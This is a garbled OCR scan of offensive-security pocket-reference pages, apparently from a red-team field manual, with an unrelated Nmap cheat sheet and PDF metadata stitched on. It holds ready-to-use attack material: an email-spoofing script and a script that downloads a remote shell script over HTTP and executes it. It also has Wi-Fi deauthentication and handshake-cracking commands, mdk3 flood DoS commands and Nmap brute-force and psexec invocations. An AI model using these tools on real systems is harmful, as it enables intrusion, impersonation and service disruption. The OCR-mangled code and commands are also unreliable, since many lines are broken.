#!/usr/bin/python
import smtplib, string
import os, time
os.system("/etc/init.d/sendmail start")
time.sleep(4)

HOST = ''localhost''
SUBJECT = "Email from spoofed sender"
TO = ''target@you.corn''
FROM= "spoof@spoof.com"
TEXT = "Message Body"
BODY = string.join( (
"From: %s" % FROH,

''To: %s'' % TO,
"Subject: %s" % SUBJECT ,
TEXT
) , "\r\n")
server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server. quit ()
time.sleep(4)
os.system("/etc/init.d/sendmail stop")

LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE
#!/usr/bin/python
import urllib2, os
urls = [ 11 1.1.1.1'',"2.2.2.2"]
port = 11 80"
payload = "cb.sh"
for url in urls:
u = "http://%s:%s/%s" % (url, port, payload)
try:
r = urllib2.urlopen(u)
wfile = open{"/tmp/cb.sh", "wb")
wfile.write(r.read())
wfile. close ()
break

except: continue
if os.path.exists("/tmp/cb.sh"):
os.system("chmod -oo /tmp/cb.sh")
os. system ( "/tmp/cb. sh")

78

PYTHON HTTP BANNER GRABBER

(*

TAKES AN IP RANGE, PORT, AND

PACKET DELAY)
#!/usr/bin/python
import urllib2, sys, time
from optparse import OptionParser
parser= OptionParser()
parser.add option{''-t'', dest=''iprange'',help=''target IP range, i.e.
192.168.1.1-25")
parser.add option(''-p'', dest=''port'',default=''80'',help=''port, default=BO'')
parser.add=option("-d", dest="delay",default=".5",help="delay (in seconds),
default=.5 seconds")
(opts, args) = parser.parse_args()
if opts.iprange is None:
parser.error("you must supply an IP range")
ips = []
headers={}
octets= opts.iprange.split(' .')
start= octets[3] .split('-') [0]
stop = octets [ 3] . split ( '-' ) [ 1]
fori in range(int(start),int(stop)+1):
ips.append('%s.%s.%s.%d' % (octets[O],octets[1] ,octets[2],i))
print '\nScanning IPs: %s\n' % (ips)
for ip in ips:
try:
response= urllib2.urlopen('http://%s:%s' % (ip,opts.port))
headers[ip] = dict(response.info())
except Exception as e:
headers[ip] = "Error: " + str(e)

J

'

time.sleep(float(opts.delay))
for header in headers:
try:
print '%s : %s' % (header,headers[header] .get('server'))
except:
print '%s : %s' % (header,headers[header])

"9

SCAPY

*

When you craft TCP packets with Scapy, the underlying OS will not
recognize the initial SYN packet and will reply with a RST packet. To
mitigate this you need to set the following Iptables rule:
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP
from scapy.all import *
ls ()
lsc ()
conf
IP(src=RandiP())
Ether(src=Randl1AC() I
ip=IP(src="l.l.l.l",dst="2.2.2.2")
tcp=TCP(dport="443")
data= 11 TCP data"
packet=ip/tcp/data
packet. show ( I
send(packet,count=l)
sendp(packet,count=2)
sendpfast(packet)
sr(packet)
srl(packet)
fori in range(O,lOOO): send (packet·)
sniff(count=lOO,iface=ethO)

SEND IPv6 ICMP

Imports all scapy libraries
List all avaiable protocols
List all scapy functions
Show/set scapy config
Generate random src IPs
Generate random src MACs
Specify IP parameters
Specify TCP parameters
Specify data portion
Create IP()/TCP() packet
Display packet configuration
Send 1 packet @ layer 3
Send 2 packets @ layer 2
Send faster using tcpreply
Send 1 packet & get replies
Send only return 1st reply
Send packet- 1000 times
Sniff 100 packets on ethO

MSG

sr ( IPv6 ( src=" ipv6

n'

dst=".ipv6

n

I /ICHP (I I

tn)p PACKET W/ SPECIFIC PAYLOAD:
ip=IP(src=''·.ip.·'', dst=''·.ip. '')
u=UDP(dport=l234, sport=5678)
pay = "my UDP packet"
packet=ip/u/pay
packet. show ( )
wrpcap ("out.pcap",packet)
write to pcap
send(packet)

NTP FUZZER
packet=IP(src="·.ip 11 ,
dst=" ip ")/UDP(dport=l23)/fuzz(NTP(version=4,mode=4) I

SEND HTTP MESSAGE
from scapy.all import *
# Add iptables rule to block attack box from sending RSTs
# Create web.txt with entire GET/POST packet data
fileweb = open(''web.txt'','r')
data = fileweb.read()
ip = IP(dst="-ip ·")
SYN=ip/TCP(rport=RandNum(6000,-000),dport=BO,flags="S",seq=4)
SYNACK = srl(SYN)
ACK=ip/TCP(sport=SYNACK.dport,dport=BO,flags="A",seq=SYNACK.ack,ack=SYNACK.
seq+l)/data
reply,error = sr(ACK)
print reply.show()

80

PERL

PERL

PORT SCANNER

use strict; use IO: :Socket;
for($port~O;$port 65535;$port++) {
$remote~IO::Socket::INET- new(
Proto= ·"tcp",PeerAddr= · 11 12-:'.0.0.l",PeerPort= $port);
if($remote) {print "$port is open\n"); )

•

'

81

REGEX EXPRESSIONS

Start of string
0 or more

+

1 or more

0 or 1
Any char but \n
{3}

Exactly 3

{3,}

3 or more

{3,5}

3 or 4 or 5

{315}

3 or 5

[345]

3 or 4 or 5

[ A34]

Not 3 or 4

[a-z]

lowercase a-z

[A-Z]

uppercase A-Z

[0-9]

digit 0-9

\d

Digit

\D

Not digit

\w

A-Z,a-z,0-9

\W

Not A-Z,a-z,0-9

\s

White Space (\t\r\n\f)

\S

Not (\t\r\n\f)

reg[ex]

"rege" or "regx"

regex?

''rege'' or ''regex''

regexk

''rege'' w/ 0 or more x

regex+

''rege'' w/ 1 or more x

[Rr]egex

''Regex'' or ''regex''

\d{3}

Exactly 3 digits

\d{ 3,)

3 or more digits

[aeiou]

Any 1 vowel

(0 [3-9] 11 [0-9]12 [0-5])

Numbers 03-25

82

'

ASCII TABLE

I

xOO
x08
x09
xOa
xOd
xlb
x20
x21
x22
x23
x24
x25
x26
x2"
x28
x29
x2a
x2b
x2c
x2d
x2e
x2f
x30
x31
x32
x33
x34
x35
x36
xr
x38
x39
x3a
x3b
x3c
x3d
x3e
x3f
x40
x41
x42
x43
x44
x45
x46
x4"
x48
x49
x4a

: NUL
: BS
: TAB
: LF
: CR
: ESC
: SPC
: !
:

"

:
:
:
:
:
:
:
:

#

x4b
x4c
x4d
x4e
x4f
x50
x51
x52
x53
x54
x55
x56
x57
x58
x59
x5a
x5b
x5c
x5d
x5e
x5f
x60
x61
x62
x63
x64
x65
x66
x6"
x68
x69
x6a
x6b
x6c
x6d
x6e
x6f
x"O
x-1
x"2
x"3

$
%
&

I
)

: +
:
'
: :

: I
: 0
: 1
: 2
: 3
: 4
: 5
: 6
:
:
:

8
9

: :
: ;
:
: =
:

: ?
:

K
L
M
N
0

:

p

: Q
: R
:

: c
: D
: E
: F

s

: T

: u
: v

: w
: X
:

y

: z
: [
: \
: l
-;-

:
: a

: b
: c
: d
: e
: f
: g
: h
: i
: j

:
:
:
:
:

:
:
:
:
x74 :
x-s :
x"6 :

@

:A
: B

:

:
:
:
:
:

k
1

m
n

o
p
q
r

s
t

u

v
x-- : w
x-8 : X
x"9 : y
x'a

G

: H
: I
: J

83

FREQUENCY CHART
120-150 kHz (LF)
13.56 t1Hz (HF)
433 t1Hz (lJHF)
315 t1Hz (N. Am)
433.92 MHz (Europe,Asia)
698-894 HHz
1-lo-1-55 t1Hz
1850-1910 t1Hz
2110-2155 t1Hz
122-.60,15~5.42 MHz
1-2 GHz
868 MHz (Europe)
915 MHz (lJS,Australia)
2.4 GHz (worldwide)
2.4-2.483.5 GHz
2.4 GHz
5.0 GHz
2.4/5.0 GHZ
4-8 GHz
12-18 GHz
18-26.5 GHz
26.5-40 GHz

RFID

Keyless Entry
Cellular (lJS)

GPS
L Band
802.15.4

(ZigBee)

802.15.1 (Bluetooth)
802 .llb/g
802.11a
802 .lln
C Band
Ku Band
K Band
Ka Band

FCC ID

LOOKUP

jhttps://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm

FREQUENCY DATABASE
http://www.radioreference.com/apps/db/
)

;

KISMET REFERENCE
e
h
n
m

i

t
g
l
u
d

c
r
L

a
H
p

+If

CTRL+L
w
Q
X

[5]

List Kismet servers
Help
Toggle full-screen view
Name current network
Toggle muting of sound
View detailed information for network
Tag or untag selected network
Sort network list
Group tagged networks
Show wireless card power levels
Ungroup current group
Dump printable strings
Show clients in current network
Packet rate graph
Lock channel hopping to selected channel
View network statistics
Return to normal channel hopping
Dump packet type
Expand/collapse groups
Follow network center
Re-draw the screen
Track alerts
Quit Kismet
Close popup window
85

LINUX WIFI COMMANDS

rfl:ill list
rfkill unblock all
airdump-ng monO

Identify wifi problems
Turn on wifi
Monitor all interfaces

CONNECT TO UNSECURED WIFI
iwconfig athO essid $SSID
ifconfig athO up
dhclient athO

CONNECT TO WEP WIFI NETWORK
iwconfig athO essid $SSID kej
ifconfig athO up
dhclient athO

kej

CONNECT TO WPA-PSK WIFI NETWORK
iwconfig athO essid $SSID
ifconfig athO up
wpa_supplicant -B -i athO -c wpa-psk.conf
dhclient athO

CONNECT TO WPA-ENTERPRISE WIFI NETWORK
iwconfig athO essid $SSID
ifconfig athO up
wpa suppl1cant -B -i athO -c wpa-ent.conf
dhclient athO

LINUX BLUETOOTH
hciconfig hciO up
hcitool -i hciO scan --flush --all
sdptool browse BD_ADDR
hciconfig hciO name "NAME" class Ox520204
pi scan
pand -K

86

Turn on bluetooth interface
Scan for bluetooth devices
List open services
Set as discoverable
Clear pand sessions

LINUX WIFI TESTING
START MONITOR MODE INTERFACE
airmon-ng stop athO
airmon-ng start wifiO
iwconfig athO channel $CH

CAPTURE CLIENT HANDSHAKE
airdump-ng -c $CH --bssid $AP -w file athO
aireplay-ng -0 10 -a $AP -c $CH athO

#Capture traffic
#Force client de-auth

BRUTE FORCE HANDSHAKE
aircrack-ng -w wordlist capture.cap
asleep -r capture.cap -w dict.asleep
eapmd5pass -r capture.cap -w wordlist

# WPA-PSK
# LEAP
# EAP-HDS

DOS ATTACKS
mdk3
mdk3

int
int

a -a $AP
b -c $CH

#Auth Flood
#Beacon Flood

l

s-

ro
ro

m

00

0

"'

-

w

N

REFERENCES
[1] t1ubix. Linux/Unix/BSD Post-Exploitation Command List.
http://bit.ly/nucONO. Accessed on 1- Oct 2012.
[2] Tomes, Tim. Safely DGmping Hashes from Live Domain Controllers.
flcto~g_l_cigtcorr.:._· com/1..QlUll.Lsafel·r-dumping-hashes-_from-li v. html. Accessed
on 14 Nov 2012.
[ 3] Reverse She 11 Cheat Sheet. ll!J~..Q_;_ L.L£.£D_t_~_.§_~nhQI'~§..:L__!_net /cheatsheet/shells/reverse-shell-cheat-sheet. Accessed on 15 Nov 2012.
[4] Damele, Bernardo. Reverse Shell One-liners.
htto://bernardodame 1 e.blogscat.com/2Jll/09/reverse-shel-s-one-liners.html.
Accessed on 15 Nov 2012.
[5] SANS Institute. IEE 802.11 Pocket Reference Guide.
httc://www.willhac}:forsushi.com/paoers/80211 Pocket Reference Guide.pdf.
Accessed on 16 Nov 2012.
[6] Tomes, Tim. Remote t1alware Deployment and a Lil' AV Bypass.
http://oauldotcom.com/2012/C51remote-malware-deplo·;ment-and.html. Accessed
on 22 Jan 2013.
[ 0 ]
Trusted Sec. Powershell Poe.
httos://\Jww.trusredsec.com/dow~loads/tools-downloadi. Accessed on 25 Jan
2013.
Following copyright and disclaimer apply:
Copyright 2012 TrustedSec, LLC. All rights reserved.
Redistribution and use in source and binary forms,
with or without
modification, are permitted prov~ded that the following conditions are met:
Redistributions in binarJ form must reproduce the above copJright notice,
this list of conditions a~d the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY TRUSTEDSEC, LLC "AS IS" AND ANY EXPRESS OR
It1PLIED WARRANTIES, INCLUDING, BUT NOT LitHTED TO, THE It1PLIED WARRANTIES
OF t1ERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAit1ED. IN
NO EVENT SHALL TRUSTEDSEC, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT,
INCIDENTAL,
SPECIAL,
EXEt1PLARY,
OR
CONSEQUENTIAL
DAt1AGES
(INCLUDING,
BUT NOT
LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT,
STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
DAt1AGE.
The views and conclusions co~tained in the software and documentation are
those of the authors and should not be interpreted as representing official
policies, either expressed or implied, of TRUSTEDSEC, LLC.
[8] SSL and stunnel. httc://www.J:ioptrix.com/blcq/?o=68-. Accessed on 01
Feb 2013.
[9] ''Using Nrnap to Screenshot Web Services''.
h t to:/ /blog. spider labs. com /:2 012/0 6/usinq-nrnao-to-screenshot -'debservices.html. Accessed on 26 Feb 2013.
[10] ''Schtasks Persistence with PowerShell One Liners''.
httc://blog.strategicc··ber.com/2013/11/09/schtasl:s-oers~stence-with-

L+.. ners_/_.

2._c:>·,v~_f ___~t.e11-on_ ~.:::-__

Accessed on 21 Nov 2013.

94

---~-·----·-----~-""'"'"""~-~....~

INDEX
A

K

s

Airmon-ng ......................... 87

Kali .................................... 12
Kismet ............................... 85

Scapy ................................. 80
Screen ............................... 11
SNMP ................................ 38
SNMPWalk ........................ 38
Socat ........................... 37, 47
Socks ........................... 47, 58
Solaris
SQLMap
SSH .................................... 55
Callback ......................... 9
Stunnel. ............................ .47
Subnetting ........................ 36

ARPing
ASCII Table ........................ 83

8
Basic Auth ......................... 69
BeEF .................................. 68
Bluetooth ......................... 86

c
Cisco
Curl

D
DNS ................... 8, 30, 39, 43
DNSRecon ......................... 39
DSQuery ............................ 28

E
Email Sender ..................... 23
Ettercap ............................ 60

F

i FCC. ..................................85
File Transfer ..................... .43
\ Fpipe ................................ .47
',Frequencies ...................... 85
l:=TP ................................... .43
G

f,ioogle
GRUB

Linux
Chkconfig
Files .............................. 7
Mount SMB ................. 12
Scripting ........................ 8
Update-rc.d ................. 11
Wifi .............................. 86
M

T

Metasploit ........................ 56
MSFPayload ................ 56
MSFVenom .................. 56
Meterpreter ................ 24, 58
Mimikatz ........................... 61
MSSQL
MySQL

User-Agents
Netcat ......................... 44, 53
Nmap ........................ 39, 51
Screenshot ................. 70

0
Open Mail Relay .............. .43
Oracle
p

ICMP
lframe .............................. 68
IKE-Scan ........................... .40
IPtables ............................. 10
1Pv4 ................................... 36
1Pv6 .................................. 37

J

R

JAVA Applet ...................... 68
John the Ripper ................. 62

Railgun .............................. 58
Regex ................................ 82
Reverse Shells ................... 44

Hashing ............................. 64
fHping3
Hydra

u

N

Password Wordlist ............ 62
PeepingTom ...................... 70
Peri
Persistence ................ .46, 59
pfSense
Polycom ........................... .48
Ports
Postgres ............................ 73
Powershell ........................ 22
Authentication Popup .23
Run as
Proxychains ....................... 58
PSEXEC ........................ 18, 46
Putty
Python

H

Tandberg ......................... .48
TCPDump .................... 12, 39
TCPReplay ......................... 39
Tunneling ......................... .47

v
VLC. ................................... 54
Volume Shadow Copy ...... 21
VPN
VSSOwn ........................... 63

VTC

w
Wget ................................. 68
Windows ........................... 15
AT Command ............. .46
Escalation .................... 31
Firewall ....................... 18
Makecab
Port Fwd ...................... 18
RDP ............................. 19
Registry ....................... 26
Remoting ..................... 16
Scripting ...................... 30
Startup
Task Scheduler ...... 32, 46
WebDAV ...................... 46
Wine

X

95

X11 .............................. 12, 55
Xterm ............................... .45

Scripting Engine

-sC Run default scripts
--script=|
|...
Run individual or groups of scripts
--script-args=
Use the list of script arguments
--script-updatedb
Update script database
Script Categories
::

Nmap's script categories include, but are not limited to, the
following:
auth: Utilize credentials or bypass authentication on target
hosts.
broadcast: Discover hosts not included on command line by
broadcasting on local network.
brute: Attempt to guess passwords on target systems, for a
variety of protocols, including http, SNMP, IAX, MySQL, VNC,
etc.
default: Scripts run automatically when -sC or -A are used.
discovery: Try to learn more information about target hosts
through public sources of information, SNMP, directory services,
and more.
dos: May cause denial of service conditions in target hosts.
exploit: Attempt to exploit target systems.
external: Interact with third-party systems not included in
target list.
fuzzer: Send unexpected input in network protocol fields.
intrusive: May crash target, consume excessive resources, or
otherwise impact target machines in a malicious fashion.
malware: Look for signs of malware infection on the target
hosts.
safe: Designed not to impact target in a negative fashion.
version: Measure the version of software or protocol spoken
by target hosts.
vul: Measure whether target systems have a known
vulnerability.

Notable Scripts

A full list of Nmap Scripting Engine scripts is
available at http://nmap.org/nsedoc/
Some particularly useful scripts include:

dns-zone-transfer: Attempts to pull a zone file
(AXFR) from a DNS server.
$ nmap --script dns-zonetransfer.nse --script-args dns-zonetransfer.domain= -p53

http-robots.txt: Harvests robots.txt files from
discovered web servers.
$ nmap --script http-robots.txt

smb-brute: Attempts to determine valid
username and password combinations via
automated guessing.
$ nmap --script smb-brute.nse -p445

smb-psexec: Attempts to run a series of
programs on the target machine, using
credentials provided as scriptargs.
$ nmap --script smb-psexec.nse –
script-args=smbuser=,
smbpass=[,config=]
-p445 

Nmap
Cheat Sheet
v1.0

! POCKET REFERENCE GUIDE
SANS Institute
http://www.sans.org

Base Syntax
# nmap [ScanType] [Options] {targets}
Target Specification
IPv4 address: 192.168.1.1
IPv6 address: AABB:CCDD::FF%eth0
Host name: www.target.tgt
IP address range: 192.168.0-255.0-255
CIDR block: 192.168.0.0/16
Use file with lists of targets: -iL 
Target Ports
No port range specified scans 1,000 most popular
ports
-F Scan 100 most popular ports
-p- Port range
-p,,... Port List
-pU:53,U:110,T20-445 Mix TCP and UDP
-r Scan linearly (do not randomize ports)
--top-ports  Scan n most popular ports
-p-65535 Leaving off initial port in range makes
Nmap scan start at port 1
-p0Leaving off end port in range makes
Nmap scan through port 65535
-pScan ports 1-65535

Probing Options
-Pn

Don't probe (assume all hosts are up)

-PB

Default probe (TCP 80, 445 & ICMP)

-PS
Check whether targets are up by probing TCP
ports
-PE

Use ICMP Echo Request

-PP

Use ICMP Timestamp Request

-PM

Use ICMP Netmask Request

Scan Types

-sP Probe only (host discovery, not port scan)
-sS SYN Scan
-sT TCP Connect Scan
-sU UDP Scan
-sV Version Scan
-O

OS Detection

--scanflags
Set custom list of TCP using
URGACKPSHRSTSYNFIN in any order

Fine-Grained Timing Options

Aggregate Timing Options

--min-hostgroup/max-hostgroup 
Parallel host scan group sizes

-T0 Paranoid: Very slow, used for IDS evasion
-T1 Sneaky: Quite slow, used for IDS evasion
-T2 Polite: Slows down to consume less
bandwidth, runs ~10 times slower than
default
-T3 Normal: Default, a dynamic timing model
based on target responsiveness
-T4 Aggressive: Assumes a fast and reliable
network and may overwhelm targets
-T5 Insane: Very aggressive; will likely
overwhelm targets or miss open ports

--min-parallelism/max-parallelism

Probe parallelization
--min-rtt-timeout/max-rtttimeout/initial-rtt-timeout 

Source Exif Data:
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.6
Linearized                      : Yes
Create Date                     : 2014:03:11 14:01:16-07:00
Creator                         : FUJITSU fi-6130dj
Modify Date                     : 2014:03:11 15:47:51-07:00
Has XFA                         : No
XMP Toolkit                     : Adobe XMP Core 5.4-c005 78.147326, 2012/08/23-13:03:03
Metadata Date                   : 2014:03:11 15:47:51-07:00
Creator Tool                    : FUJITSU fi-6130dj
Format                          : application/pdf
Document ID                     : uuid:ff15d086-c700-4ecf-8715-7f07dc83f8fe
Instance ID                     : uuid:d5b60a18-1ac0-4984-af39-0ccd8e1a00c2
Producer                        : Adobe Acrobat Pro 11.0.0 Paper Capture Plug-in
Page Count                      : 111
EXIF Metadata provided by EXIF.tools

Navigation menu